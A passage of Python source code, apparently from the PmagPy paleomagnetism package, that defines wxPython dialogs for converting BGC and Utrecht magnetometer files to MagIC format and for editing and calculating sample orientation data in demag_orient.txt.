border=10)\n vbox.Add(self.bSizer1a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, 
flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n\n options = {}\n full_file = self.bSizer0.return_value()\n\n ID, infile = os.path.split(full_file)\n options['dir_path'] = self.WD\n options['input_dir_path'] = ID\n options['mag_file'] = infile\n outfile = infile + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = infile + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = infile + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = infile + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = infile + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n\n user = str(self.bSizer1a.return_value())\n options['user'] = str(user)\n loc_name = str(self.bSizer1.return_value())\n options['location'] = str(loc_name)\n site_name = self.bSizer2.return_value()\n if site_name!='': options['site'] = str(site_name)\n spec_num = self.bSizer7.return_value()\n options['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n ncn = self.bSizer6.return_value()\n options['samp_con'] = ncn\n\n meth_code = self.bSizer3.return_value()\n options['meth_code'] = meth_code\n\n average = self.bSizer4.return_value()\n options['noave'] = average\n\n volume = self.bSizer5.return_value()\n if volume:\n try:\n options['volume'] = float(volume)\n except ValueError:\n pw.simple_warning('You must provide a valid numerical value for specimen volume')\n return False\n\n for key, value in list(options.items()):\n print(key, value)\n\n COMMAND = \"options = {}\\nconvert.bgc(**options)\".format(str(options))\n\n if infile=='':\n all_files=[f for f in os.listdir('.') if os.path.isfile(f)]\n outfiles=[]\n for infile in all_files:\n options['mag_file'] = infile\n outfile = infile + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = infile + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = infile + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = infile + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = infile + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n try:\n program_ran, error_message = convert.bgc(**options)\n except IndexError:\n continue\n if program_ran:\n outfiles.append(outfile)\n outfile = str(outfiles)\n else:\n program_ran, error_message = convert.bgc(**options)\n\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Raise()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.bgc.__doc__)\n\nclass convert_Utrecht_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\n A GUI which allows easy input of metadata required to convert Utrecht\n Magnetometer files into MagIC format for analysis or contribution to the\n EarthRef MagIC 
Archive.\n \"\"\"\n\n def InitUI(self):\n \"\"\"\n Override of InitUI in parent class convert_files_to_MagIC.\n Creates UI for input of relevant data to convert Utrecht to MagIC.\n \"\"\"\n\n pnl = self.panel\n\n TEXT = \"Convert Utrecht Magnetometer file format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.select_ncn(pnl)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.specimen_n(pnl)\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 5 ---\n self.bSizer5 = pw.replicate_measurements(pnl)\n\n #---sizer 6 ----\n self.bSizer6 = pw.lab_field(pnl)\n\n #---sizer 7 ---\n TEXT= \"use the European date format (dd/mm/yyyy)\"\n self.bSizer7 = pw.check_box(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n \"\"\"\n Compiles information input in the GUI into a kwargs dictionary which can\n be passed into the utrecht_magic script and run to output magic files\n \"\"\"\n os.chdir(self.WD)\n options_dict = {}\n wd = self.WD\n options_dict['dir_path'] = wd\n full_file = self.bSizer0.return_value()\n if not full_file:\n pw.simple_warning('You must provide a Utrecht format file')\n return False\n input_directory, Utrecht_file = os.path.split(full_file)\n options_dict['mag_file'] = Utrecht_file\n options_dict['input_dir_path'] = input_directory\n if input_directory:\n ID = \"-ID \" + input_directory\n else:\n ID = ''\n outfile = Utrecht_file + \".magic\"\n options_dict['meas_file'] = outfile\n spec_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_specimens.txt\"\n options_dict['spec_file'] = spec_outfile\n samp_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_samples.txt\"\n options_dict['samp_file'] = samp_outfile\n site_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_sites.txt\"\n options_dict['site_file'] = site_outfile\n loc_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_locations.txt\"\n options_dict['loc_file'] = loc_outfile\n dc_flag,dc_params = '',''\n if self.bSizer6.return_value() != '':\n dc_params = 
list(map(float,self.bSizer6.return_value().split()))\n options_dict['lab_field'] = dc_params[0]\n options_dict['phi'] = dc_params[1]\n options_dict['theta'] = dc_params[2]\n dc_flag = '-dc ' + self.bSizer6.return_value()\n spec_num = self.bSizer3.return_value()\n options_dict['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n loc_name = self.bSizer4.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n particulars = self.bSizer1.return_value()\n options_dict['meth_code'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n euro_date = self.bSizer7.return_value()\n if euro_date: options_dict['dmy_flag'] = True; dmy_flag='-dmy'\n else: options_dict['dmy_flag'] = False; dmy_flag=''\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n replicate = self.bSizer5.return_value()\n if replicate:\n options_dict['noave'] = True\n replicate = ''\n else:\n options_dict['noave'] = False\n replicate = '-A'\n\n COMMAND = \"utrecht_magic.py -WD {} -f {} -F {} {} {} {} -ncn {} {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} {} {} -lat {} -lon {}\".format(wd, Utrecht_file, outfile, particulars, spec_num, loc_name, ncn, ID, spec_outfile, samp_outfile, site_outfile, loc_outfile, replicate, dc_flag, dmy_flag, lat, lon)\n # to run as module:\n program_ran, error_message = convert.utrecht(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n \"\"\"\n Displays the utrecht_magic script's help message\n \"\"\"\n pw.on_helpButton(text=convert.utrecht.__doc__)\n\n\n# template for an import window\nclass something(wx.Frame):\n\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n text = \"Hello here is a bunch of text\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=text), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n\n #---sizer 2 ----\n\n #---sizer 3 ----\n\n #---sizer 4 ----\n\n #---sizer 5 ---\n\n #---sizer 6 ----\n\n #---sizer 7 ---\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_add_file_button(self,event):\n text = \"choose file to 
convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, self.WD, event, text)\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n COMMAND = \"\"\n pw.run_command_and_close_window(self, COMMAND, outfile)\n\n def on_helpButton(self, event):\n pw.on_helpButton(text='')\n\n\n#=================================================================\n# demag_orient:\n# read/write demag_orient.txt\n# calculate sample orientation\n#=================================================================\n\n\nclass OrientFrameGrid3(wx.Frame):\n def __init__(self, parent, id, title, WD, contribution, size):\n wx.Frame.__init__(self, parent, -1, title, size=size,\n name='calculate geographic directions')\n\n #--------------------\n # initialize stuff\n #--------------------\n self.parent = parent\n if sys.platform in ['win32', 'win64']:\n self.panel = wx.ScrolledWindow(self, style=wx.SIMPLE_BORDER|wx.ALWAYS_SHOW_SB)\n else:\n self.panel = wx.Panel(self, style=wx.SIMPLE_BORDER)\n\n self.WD = WD\n #self.Data_hierarchy = Data_hierarchy\n self.contribution = contribution\n\n # contribution has already propagated measurement data...\n if 'samples' not in self.contribution.tables:\n print('-E- No sample data available')\n samples_name_list = []\n else:\n samples_name_list = self.contribution.tables['samples'].df.index.unique()\n\n self.orient_data = {}\n try:\n fname = os.path.join(self.WD, \"demag_orient.txt\")\n self.orient_data, dtype, keys = pmag.magic_read_dict(fname, sort_by_this_name=\"sample_name\",\n return_keys=True)\n\n except Exception as ex:\n print(\"-W-\", ex)\n\n # re-do the 'quit' binding so that it only closes the current window\n self.parent.Bind(wx.EVT_MENU, lambda event: self.parent.menubar.on_quit(event, self), self.parent.menubar.file_quit)\n\n # self.headers is a list of two-item tuples.\n #the first is the proper column name as understood by orientation_magic.py\n # the second is the name for display in the GUI\n self.header_display_names = [\"sample_name\", \"sample_orientation_flag\", \"mag_azimuth\",\n \"field_dip\", \"bedding_dip_direction\", \"bedding_dip\",\n \"shadow_angle\", \"latitude\", \"longitude\", \"mm/dd/yy\",\n \"hh:mm\", \"GPS_baseline\", \"GPS_Az\"]\n self.header_names = [\"sample_name\", \"sample_orientation_flag\", \"mag_azimuth\",\n \"field_dip\", \"bedding_dip_direction\", \"bedding_dip\",\n \"shadow_angle\", \"lat\", \"long\", \"date\",\n \"hhmm\", \"GPS_baseline\", \"GPS_Az\"]\n self.headers = list(zip(self.header_names, self.header_display_names))\n\n # get sample table and convert relevant headers to orient.txt format\n if (not self.orient_data) and ('samples' in self.contribution.tables):\n print(\"-I- Couldn't find demag_orient.txt, trying to extract information from samples table\")\n samp_container = self.contribution.tables['samples']\n # get lat/lon from sites if available\n if 'sites' in self.contribution.tables:\n site_contianer = self.contribution.tables['sites']\n self.contribution.propagate_cols(['lat', 'lon'], 'samples', 'sites')\n #\n raw_orient_data = samp_container.convert_to_pmag_data_list(\"dict\")\n # convert from 3.0. headers to orient.txt headers\n self.orient_data = {}\n orient_data = {}\n # must group to ensure that lat/lon/etc. 
are found no matter what\n df = samp_container.df\n res = df.T.apply(dict).groupby(df.index)\n for grouped in res:\n new_dict = {}\n ind_name = grouped[0]\n dictionaries = grouped[1]\n for dictionary in dictionaries:\n for key, value in dictionary.items():\n if key in new_dict:\n continue\n if (value and (value != 'None')) or (value == 0):\n new_dict[key] = value\n for key in dictionary.keys():\n if key not in new_dict:\n new_dict[key] = None\n orient_data[ind_name] = new_dict\n for key, rec in list(orient_data.items()):\n self.orient_data[key] = map_magic.mapping(rec, map_magic.magic3_2_orient_magic_map)\n # create grid\n self.create_sheet()\n\n TEXT = \"\"\"A template file named 'demag_orient.txt', for sample-level orientation data, was created in your MagIC working directory.\n\n You can view/modify demag_orient.txt here. To edit all the values in a column, click on the column header and then enter your desired value, or select an item from the drop-down menu.\n\n If you already have these data in MagIC format in Excel or Open Office, save the file as 'tab delimited' and then use the 'Import Orientation File' button below.\n\n After orientation data is filled in, you can Calculate sample orientations. Method codes will be added during this step. This will write orientation data to the site and sample tables.\n\"\"\"\n label_boxsizer = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, 'input orientation data ' ), wx.VERTICAL )\n # width, height\n label = wx.StaticText(self.panel, label=TEXT, size=(600, 200))\n btn_box = wx.BoxSizer(wx.HORIZONTAL)\n save_btn = wx.Button(self.panel, wx.ID_ANY, \"Save Orientation File\")\n self.Bind(wx.EVT_BUTTON, self.on_m_save_file, save_btn)\n import_btn = wx.Button(self.panel, wx.ID_ANY, \"Import Orientation File\")\n self.Bind(wx.EVT_BUTTON, self.on_m_open_file, import_btn)\n calculate_btn = wx.Button(self.panel, wx.ID_ANY, \"Calculate Sample Orientations\")\n self.Bind(wx.EVT_BUTTON, self.on_m_calc_orient, calculate_btn)\n btn_box.Add(save_btn)\n btn_box.Add(import_btn, flag=wx.LEFT, border=5)\n btn_box.Add(calculate_btn, flag=wx.LEFT, border=5)\n\n self.vbox = wx.BoxSizer(wx.VERTICAL)\n #\n label_boxsizer.Add(label, flag=wx.CENTRE)\n self.vbox.Add(label_boxsizer, flag=wx.CENTRE|wx.ALL, border=15)\n #self.vbox.Add(label, flag=wx.CENTRE|wx.ALL, border=15)\n self.vbox.Add(btn_box, flag=wx.CENTRE)\n self.vbox.Add(self.grid, flag=wx.ALL, border=20)\n self.hbox_all = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.Add(self.vbox)\n if sys.platform in ['win32', 'win64']:\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.panel.SetSizer(self.hbox_all)\n self.hbox_all.Fit(self)\n\n self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)\n # save the template\n self.on_m_save_file(None)\n self.Centre()\n self.Show()\n\n\n\n def create_sheet(self):\n '''\n create an editable grid showing demag_orient.txt\n '''\n #--------------------------------\n # orient.txt supports many other headers\n # but we will only initialize with\n # the essential headers for\n # sample orientation and headers present\n # in existing demag_orient.txt file\n #--------------------------------\n\n\n #--------------------------------\n # create the grid\n #--------------------------------\n\n samples_list = list(self.orient_data.keys())\n samples_list.sort()\n self.samples_list = [ sample for sample in samples_list if sample != \"\" ]\n #self.headers.extend(self.add_extra_headers(samples_list))\n display_headers = [header[1] for header in self.headers]\n self.grid = 
magic_grid.MagicGrid(self.panel, 'orient grid',\n self.samples_list, display_headers)\n self.grid.InitUI()\n\n #--------------------------------\n # color the columns by groups\n #--------------------------------\n\n for i in range(len(self.samples_list)):\n self.grid.SetCellBackgroundColour(i, 0, \"LIGHT GREY\")\n self.grid.SetCellBackgroundColour(i, 1, \"LIGHT STEEL BLUE\")\n self.grid.SetCellBackgroundColour(i, 2, \"YELLOW\")\n self.grid.SetCellBackgroundColour(i, 3, \"YELLOW\")\n self.grid.SetCellBackgroundColour(i, 4, \"PALE GREEN\")\n self.grid.SetCellBackgroundColour(i, 5, \"PALE GREEN\")\n self.grid.SetCellBackgroundColour(i, 6, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 7, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 8, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 9, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 10, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 11, \"LIGHT MAGENTA\")\n self.grid.SetCellBackgroundColour(i, 12, \"LIGHT MAGENTA\")\n\n\n #--------------------------------\n # fill data from self.orient_data\n #--------------------------------\n\n headers = [header[0] for header in self.headers]\n for sample in self.samples_list:\n for key in list(self.orient_data[sample].keys()):\n if key in headers:\n sample_index = self.samples_list.index(sample)\n i = headers.index(key)\n val = str(self.orient_data[sample][key])\n # if it's a pmag_object, use its name\n try:\n val = val.name\n except AttributeError:\n pass\n if val and val != \"None\":\n self.grid.SetCellValue(sample_index, i, val)\n\n #--------------------------------\n\n #--------------------------------\n # fill in some default values\n #--------------------------------\n for row in range(self.grid.GetNumberRows()):\n col = 1\n if not self.grid.GetCellValue(row, col):\n self.grid.SetCellValue(row, col, 'g')\n\n #--------------------------------\n\n # temporary trick to get drop-down-menus to work\n self.grid.changes = {'a'}\n\n self.grid.AutoSize()\n self.drop_down_menu = drop_down_menus3.Menus(\"orient\", self.contribution, self.grid)\n self.Bind(wx.grid.EVT_GRID_LABEL_LEFT_CLICK, self.onLeftClickLabel, self.grid)\n\n def update_sheet(self):\n self.grid.Destroy()\n self.create_sheet()\n self.vbox.Add(self.grid, flag=wx.ALL, border=20)\n #self.Hide()\n #self.Show()\n self.hbox_all.Fit(self.panel)\n #self.panel.Refresh()\n self.Hide()\n self.Show()\n\n def onLeftClickLabel(self, event):\n \"\"\"\n When user clicks on a grid label, determine if it is a row label or a col label.\n Pass along the event to the appropriate function.\n (It will either highlight a column for editing all values, or highlight a row for deletion).\n \"\"\"\n #if event.Col == -1 and event.Row == -1:\n # pass\n #elif event.Col < 0:\n # self.onSelectRow(event)\n if event.Row < 0:\n self.drop_down_menu.on_label_click(event)\n\n\n def on_m_open_file(self,event):\n '''\n open orient.txt\n read the data\n display the data from the file in a new grid\n '''\n dlg = wx.FileDialog(\n self, message=\"choose orient file\",\n defaultDir=self.WD,\n defaultFile=\"\",\n style=wx.FD_OPEN | wx.FD_CHANGE_DIR\n )\n if dlg.ShowModal() == wx.ID_OK:\n orient_file = dlg.GetPath()\n dlg.Destroy()\n new_data, dtype, keys = pmag.magic_read_dict(orient_file,\n sort_by_this_name=\"sample_name\",\n return_keys=True)\n\n if len(new_data) > 0:\n self.orient_data={}\n self.orient_data=new_data\n #self.create_sheet()\n self.update_sheet()\n print(\"-I- If you don't see a change in the spreadsheet, you may need to manually re-size the window\")\n\n 
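# --- Editor's sketch (comment only; not part of the original PmagPy source). ---\n # on_m_save_file below writes a plain tab-delimited file: a 'tab\\tdemag_orient'\n # header line, then the tab-joined column names, then one tab-joined row per\n # sample. With the default self.headers it looks roughly like this (the sample\n # name and values here are made up):\n # tab\\tdemag_orient\n # sample_name\\tsample_orientation_flag\\tmag_azimuth\\tfield_dip\\t...\n # mgf12a\\tg\\t265\\t43\\t...\n 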
def on_m_save_file(self,event):\n\n '''\n save demag_orient.txt\n (only the columns that appear on the grid frame)\n '''\n fout = open(os.path.join(self.WD, \"demag_orient.txt\"), 'w')\n STR = \"tab\\tdemag_orient\\n\"\n fout.write(STR)\n headers = [header[0] for header in self.headers]\n STR = \"\\t\".join(headers) + \"\\n\"\n fout.write(STR)\n for sample in self.samples_list:\n STR = \"\"\n for header in headers:\n sample_index = self.samples_list.index(sample)\n i = headers.index(header)\n value = self.grid.GetCellValue(sample_index, i)\n STR = STR + value + \"\\t\"\n fout.write(STR[:-1] + \"\\n\")\n fout.close()\n if event is not None:\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=\"data saved in file demag_orient.txt\" ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n\n def on_m_calc_orient(self,event):\n '''\n This function does exactly what the 'import orientation' function does in MagIC.py:\n after some dialog boxes the function calls orientation_magic.py\n '''\n # first, save the current grid to demag_orient.txt\n self.on_m_save_file(None)\n orient_convention_dia = orient_convention(None)\n orient_convention_dia.Center()\n #orient_convention_dia.ShowModal()\n if orient_convention_dia.ShowModal() == wx.ID_OK:\n ocn_flag = orient_convention_dia.ocn_flag\n dcn_flag = orient_convention_dia.dcn_flag\n gmt_flags = orient_convention_dia.gmt_flags\n orient_convention_dia.Destroy()\n else:\n return\n\n or_con = orient_convention_dia.ocn\n dec_correction_con = int(orient_convention_dia.dcn)\n try:\n hours_from_gmt = float(orient_convention_dia.gmt)\n except:\n hours_from_gmt = 0\n try:\n dec_correction = float(orient_convention_dia.correct_dec)\n except:\n dec_correction = 0\n\n method_code_dia=method_code_dialog(None)\n method_code_dia.Center()\n if method_code_dia.ShowModal() == wx.ID_OK:\n bedding_codes_flags=method_code_dia.bedding_codes_flags\n methodcodes_flags=method_code_dia.methodcodes_flags\n method_code_dia.Destroy()\n else:\n print(\"-I- Canceling calculation\")\n return\n\n method_codes = method_code_dia.methodcodes\n average_bedding = method_code_dia.average_bedding\n bed_correction = method_code_dia.bed_correction\n\n command_args=['orientation_magic.py']\n command_args.append(\"-WD %s\"%self.WD)\n command_args.append(\"-Fsa er_samples_orient.txt\")\n command_args.append(\"-Fsi er_sites_orient.txt \")\n command_args.append(\"-f %s\"%\"demag_orient.txt\")\n command_args.append(ocn_flag)\n command_args.append(dcn_flag)\n command_args.append(gmt_flags)\n command_args.append(bedding_codes_flags)\n command_args.append(methodcodes_flags)\n commandline = \" \".join(command_args)\n\n print(\"-I- executing command: %s\" %commandline)\n os.chdir(self.WD)\n if os.path.exists(os.path.join(self.WD, 'er_samples.txt')) or os.path.exists(os.path.join(self.WD, 'er_sites.txt')):\n append = True\n elif os.path.exists(os.path.join(self.WD, 'samples.txt')) or os.path.exists(os.path.join(self.WD, 'sites.txt')):\n append = True\n else:\n append = False\n samp_file = \"er_samples.txt\"\n site_file = \"er_sites.txt\"\n success, error_message = ipmag.orientation_magic(or_con, dec_correction_con, dec_correction,\n bed_correction, hours_from_gmt=hours_from_gmt,\n method_codes=method_codes, average_bedding=average_bedding,\n orient_file='demag_orient.txt', samp_file=samp_file,\n site_file=site_file, input_dir_path=self.WD,\n output_dir_path=self.WD, append=append, data_model=3)\n\n if not success:\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=\"-E- ERROR: Error in running 
orientation_magic\\n{}\".format(error_message) ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n print(\"-E- ERROR: Error in running orientation_magic\")\n return\n else:\n dlg2 = wx.MessageDialog(None,caption=\"Message:\", message=\"-I- Successfully ran orientation_magic\", style=wx.OK|wx.ICON_INFORMATION)\n dlg2.ShowModal()\n dlg2.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n self.contribution.add_magic_table('samples')\n return\n\n\n def OnCloseWindow(self,event):\n dlg1 = wx.MessageDialog(self,caption=\"Message:\", message=\"Save changes to demag_orient.txt?\\n \" ,style=wx.OK|wx.CANCEL)\n result = dlg1.ShowModal()\n if result == wx.ID_OK:\n self.on_m_save_file(None)\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n if result == wx.ID_CANCEL:\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n\n\nclass orient_convention(wx.Dialog):\n\n def __init__(self, *args, **kw):\n super(orient_convention, self).__init__(*args, **kw)\n\n self.InitUI()\n #self.SetSize((250, 200))\n self.SetTitle(\"set orientation convention\")\n\n def InitUI(self):\n\n pnl = wx.Panel(self)\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n #-----------------------\n # orientation convention\n #-----------------------\n\n sbs = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'orientation convention' ), wx.VERTICAL )\n\n sbs.AddSpacer(5)\n self.oc_rb1 = wx.RadioButton(pnl, -1,label='Pomeroy: Lab arrow azimuth = mag_azimuth; Lab arrow dip=-field_dip (field_dip is hade)',name='1', style=wx.RB_GROUP)\n sbs.Add(self.oc_rb1)\n sbs.AddSpacer(5)\n self.oc_rb2 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth-90 (mag_azimuth is strike); Lab arrow dip = -field_dip', name='2')\n sbs.Add(self.oc_rb2)\n sbs.AddSpacer(5)\n self.oc_rb3 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth; Lab arrow dip = 90-field_dip (field_dip is inclination of lab arrow)', name='3')\n sbs.Add(self.oc_rb3)\n sbs.AddSpacer(5)\n self.oc_rb4 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth and dip are same as mag_azimuth, field_dip', name='4')\n sbs.Add(self.oc_rb4)\n sbs.AddSpacer(5)\n self.oc_rb5 = wx.RadioButton(pnl, -1, label='ASC: Lab arrow azimuth and dip are mag_azimuth, field_dip-90 (field arrow is inclination of specimen Z direction)',name='5')\n sbs.Add(self.oc_rb5)\n sbs.AddSpacer(5)\n self.oc_rb6 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth-90 (mag_azimuth is strike); Lab arrow dip = 90-field_dip', name='6')\n sbs.Add(self.oc_rb6)\n sbs.AddSpacer(5)\n\n #-----------------------\n # declination correction\n #-----------------------\n sbs2 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'declination correction' ), wx.VERTICAL )\n hbox_dc1 = wx.BoxSizer(wx.HORIZONTAL)\n\n sbs2.AddSpacer(5)\n self.dc_rb1 = wx.RadioButton(pnl, -1, 'Use the IGRF DEC value at the lat/long and date supplied', (10, 50), style=wx.RB_GROUP)\n self.dc_rb2 = wx.RadioButton(pnl, -1, 'Use this DEC:', (10, 50))\n self.dc_tb2 = wx.TextCtrl(pnl,style=wx.CENTER)\n self.dc_rb3 = wx.RadioButton(pnl, -1, 'DEC=0, mag_az is already corrected in file', (10, 50))\n\n sbs2.Add(self.dc_rb1)\n sbs2.AddSpacer(5)\n hbox_dc1.Add(self.dc_rb2)\n hbox_dc1.AddSpacer(5)\n hbox_dc1.Add(self.dc_tb2)\n sbs2.Add(hbox_dc1)\n\n sbs2.AddSpacer(5)\n sbs2.Add(self.dc_rb3)\n sbs2.AddSpacer(5)\n\n\n #-----------------------\n # orienation priority\n #-----------------------\n sbs3 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'orientation priority' ), 
